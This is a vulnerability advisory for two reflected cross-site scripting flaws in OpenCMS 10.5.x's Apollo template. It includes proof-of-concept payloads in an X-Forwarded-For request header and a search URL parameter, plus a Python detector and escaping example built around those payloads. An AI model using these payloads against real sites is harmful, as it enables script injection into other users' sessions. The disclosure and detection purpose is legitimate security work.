Vendor: OpenCMS
By: Aetsu
CVSS: 6.1 (MEDIUM)
Title: Multiple XSS
CWE: 79
Product Name: OpenCMS
Affected Version From: 10.5.4
Affected Version To: 10.5.5
Patch Exists: YES
Related CVE: CVE-2019-13234, CVE-2019-13235
CPE: a:alkacon:opencms:10.5.5
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: 10.5.5 / 10.5.4
2019
Alkacon OpenCMS 10.5.x – Multiple XSS in Apollo Template
The first vulnerability appears when the X-Forwarded-For header carries a payload, as shown in the next request:

    GET /login/index.html?requestedResource=&name=Editor&password=editor&action=login HTTP/1.1
    Host: example.com
    X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja

The second is a reflected XSS in the search engine (affected parameter: q). POC:

    https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax&
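Both reflection points above can be watched for on the wire. The following is an added example, not OpenCMS code and not part of the original advisory: it parses a raw request head, flags markup in the X-Forwarded-For header and the q parameter (after URL decoding), and shows the output encoding that stops the reflection. The heuristic regex, function names and sample requests are constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Heuristic (constructed for this example): a tag opener followed by a tag
# name, or an on*= event handler, inside values that should never carry markup.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=", re.IGNORECASE)
WATCHED_HEADERS = ("x-forwarded-for",)  # the two injection points from the advisory
WATCHED_PARAMS = ("q",)

def parse_request(raw):
    """Split a raw HTTP request head into (method, target, {lower-name: value})."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers

def find_reflected_xss_attempts(raw):
    """Return [(location, decoded value)] for watched fields that carry markup."""
    _, target, headers = parse_request(raw)
    hits = []
    for name in WATCHED_HEADERS:
        value = unquote(headers.get(name, ""))  # header may arrive URL-encoded
        if MARKUP_RE.search(value):
            hits.append(("header:" + name, value))
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)  # decodes %xx
    for name in WATCHED_PARAMS:
        for value in query.get(name, []):
            if MARKUP_RE.search(value):
                hits.append(("param:" + name, value))
    return hits

def safe_reflect(value):
    """HTML-encode a value before echoing it into a page (the output-encoding fix)."""
    return html.escape(value, quote=True)

# Constructed sample requests: the two vectors from this page and a benign request.
XFF_REQUEST = (
    "GET /login/index.html?action=login HTTP/1.1\r\nHost: example.com\r\n"
    "X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja\r\n"
)
SEARCH_REQUEST = (
    "GET /apollo-demo/search/index.html?q=demo%20examplez4e62%22%3e%3cscript%3e"
    "alert(1)%3c%2fscript%3ewhhpg&reloaded HTTP/1.1\r\nHost: example.com\r\n"
)
BENIGN_REQUEST = ("GET /apollo-demo/search/index.html?q=demo HTTP/1.1\r\n"
                  "Host: example.com\r\nX-Forwarded-For: 203.0.113.7, 198.51.100.2\r\n")
```

A proxy or WAF rule built on the same idea should log the decoded value rather than block on it alone, since the regex is a heuristic and a comma-separated list of addresses is the only legitimate shape for X-Forwarded-For.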
Mitigation:
The user should not use the X-Forwarded-For header in the request and should not use the vulnerable search engine.